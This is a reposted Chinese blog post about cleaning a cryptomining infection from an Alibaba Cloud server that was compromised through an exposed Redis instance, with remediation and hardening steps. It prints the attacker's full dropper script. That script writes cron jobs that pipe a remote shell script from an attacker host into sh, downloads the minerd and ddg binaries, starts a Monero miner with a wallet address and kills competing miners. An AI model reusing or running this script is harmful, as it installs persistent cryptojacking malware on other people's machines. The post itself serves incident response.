突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下:

 root           386m   S 300.0  0.1   : /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT

 root          3448m 292m  14m S  1.7  3.7  :02.07 /usr/java/default/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/us

 root           220m 9.9m  S  0.3  0.1   :09.02 /tmp/ddg.

    root             S  0.0  0.0   :00.61 /sbin/init

有个进程minerd尽然占用了300%的CPU, 百度了一下,貌似服务器被利用Redis漏洞攻击,植入了挖矿程序,挖类似比特币的东西。

查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597

但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd  ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd  ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/ * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下,感兴趣的可以研究下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin  

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root  

if [ ! -f "/tmp/ddg.217" ]; then

    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217

fi

chmod +x /tmp/ddg. && /tmp/ddg.

killall /tmp/ddg.  

if [ -d "/opt/yam" ]; then

    rm -rf /opt/yam

fi  

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -  

#/opt/minerd -h

#if [ $? != "0" ]; then

    #ps auxf|grep -v grep|grep "/opt/minerd"

    #if [ $? != "0" ]; then

        #if [ ! -f /opt/yam ]; then

            #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam

        #fi

        #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr

    #fi

#fi  

DoMiner()

{

    if [ ! -f "/tmp/AnXqV" ]; then

        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV

    fi

    chmod +x /tmp/AnXqV

    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x

}

ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner  

DoRedis6379()

{

    iptables -F REDIS6379

    iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 0.0.0.0/ -p tcp --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 10.0.0.0/ -p tcp --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 169.254.0.0/ -p tcp --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 172.16.0.0/ -p tcp --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 192.168.0.0/ -p tcp --dport  -j ACCEPT

    #iptables -A REDIS6379 -s 224.0.0.0/ -p tcp --dport  -j ACCEPT

    iptables -A REDIS6379 -p TCP --dport  -j REJECT

    iptables -I INPUT -j REDIS6379

}

iptables -D OUTPUT -j REDIS6379

iptables -F REDIS6379

iptables -X REDIS6379

iptables -D INPUT -j REDIS63792

iptables -F REDIS63792

iptables -X REDIS63792

#iptables -N REDIS6379 && DoRedis6379

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

  1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
  2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
  3. 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
  4. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]的更多相关文章

  1. 挖矿程序minerd入侵分析和解决办法

    现在比特币的价格涨得很高,所以现在有黑客专门制造挖矿木马来诱导网友,从而达到控制电脑上的显卡来挖掘比特币.为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高.如果你是一 ...

  2. 阿里云服务器ssh经常一段时间就断掉解决办法

    #vim /etc/ssh/sshd_config 找到下面两行 #ClientAliveInterval 0#ClientAliveCountMax 3 去掉注释,改成 ClientAliveInt ...

  3. 阿里云服务器被挖矿minerd入侵的解决办法

    上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似, ...

  4. CentOS7阿里云服务器,python程序requests无法正常post网站(报502)

    问题描述: 使用jenkins构建接口自动化测试时,发现新增加的接口case不能访问通,会报502错误(本地可以跑通,在测试服就会502)解决的思路: 缩小调试范围(去掉jenkins db环境,将问 ...

  5. LInux 阿里云系统遇到挖矿程序

    参考 https://blog.csdn.net/qq_37837029/article/details/82314428 重要的一点,移除下面文件里面的定时任务 /var/spool/cron/cr ...

  6. 腾讯云服务器ssh登录老是自动断开链接的解决办法

    vim /etc/ssh/sshd_config 找到下面两行 #ClientAliveInterval 0 #ClientAliveCountMax 3 去掉注释,改成 ClientAliveInt ...

  7. 微信小程序阿里云服务器https搭建

    已更新 2018-11-20 1.什么是https?HTTPS(全称:安全套接字层上的超文本传输​​协议),是以安全为目标的HTTP通道,简单讲是HTTP的安全版.即HTTP下加入SSL层,HTTPS ...

  8. 阿里云服务器sshd-D cpu占用过高

    发现阿里云服务器cpu占用到达了100%,原因是被植入了挖矿程序,解决方法如下 1.使用top命令查看进程id 直接kill杀死该进程过一会就会重新启动. 2.查看该进程所在的文件目录 这个文件基本上 ...

  9. 阿里云服务器上配置并使用: PHP + Redis + Mysql 从配置到使用

    (原创出处为本博客,http://www.cnblogs.com/linguanh/) 目录: 一,下载 二,解压 三,配置与启动 四,测试 Redis 五,配置 phpRedis 扩展 六,综合测试 ...

随机推荐

  1. 关于Jsp中的三种弹框

    对话框有三种 1:只是提醒,不能对脚本产生任何改变: 2:一般用于确认,返回 true 或者 false ,所以可以轻松用于 if...else...判断 3:一个带输入的对话框,可以返回用户填入的字 ...

  2. 深度可分离卷积结构(depthwise separable convolution)计算复杂度分析

    https://zhuanlan.zhihu.com/p/28186857 这个例子说明了什么叫做空间可分离卷积,这种方法并不应用在深度学习中,只是用来帮你理解这种结构. 在神经网络中,我们通常会使用 ...

  3. wampserver下配置虚拟主机 实现多站点支持

    wampserver下配置虚拟主机 实现多站点支持 wampserver是由德国人开发,在windows环境下实现apache+php+mysql的一款集成环境软件,wampserver自带SQLit ...

  4. 使用ffmpeg的av_read_frame,如何控制连接超时

    最近使用ffmpeg来做一个rtsp的客户端,这过程也遇到不少问题,不过相应都比较好,一路走下来.不过到项目结尾时,且遇到一个比较纠结的问题.那就是客户端在使用的过程中,把rtsp服务器的网断了.这时 ...

  5. RelativeLayout用代码兑现布局

    RelativeLayout用代码实现布局TextView txt1 = new TextView(this);      RelativeLayout.LayoutParams params = n ...

  6. 開始学习swift,资料汇总帖

    最近開始学习swift,以后mac和ios开发就指望它,曾经学oc半途而废了.主要原因是oc等语法实在能适应,如今有swift了.语法有js,scala,python,c++,oc等语言的影子,又一次 ...

  7. CentOS和Ubuntu安装软件命令对比(区别)

    此表内容来自<Ubuntu Server最佳方案>,CentOS和Ubuntu(Debian)是VPS最常见的系统,这份表很实用,分享下  

  8. php图片添加文字水印方法汇总

    方法一: <?php header("content-type:text/html;charset=utf-8"); //指定图片路径 $src = "img/a. ...

  9. write solid code Chapter 2 练习题4 的解答与扩展

    原题: 4.When programmers add new elements to an enumeration, they sometimes forget to add new cases to ...

  10. c++primer记录(二) 模板

    因为看得源码里有大量的类模板,所以补充下C++中模板的知识 模板:函数模板 类模板 .p- 函数模板的类型参数可由编译器进行推断,也可以由用户显式的指定,类模板的类型参数必须显式的给出: p- 非类型 ...